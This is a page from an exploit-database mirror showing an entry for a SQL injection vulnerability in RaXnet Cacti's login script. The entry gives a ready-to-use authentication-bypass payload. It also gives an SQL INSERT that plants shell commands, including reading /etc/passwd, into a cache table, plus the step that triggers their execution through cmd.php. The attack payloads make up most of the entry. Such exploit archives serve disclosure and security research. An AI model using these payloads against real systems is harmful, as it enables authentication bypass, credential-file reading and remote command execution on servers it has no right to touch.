bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/24375.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
982 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/10960/info
RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.
It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.
username = admin' or '6'='6
password = password wished
insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');
Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.
Reference in a new issue View git blame Copy permalink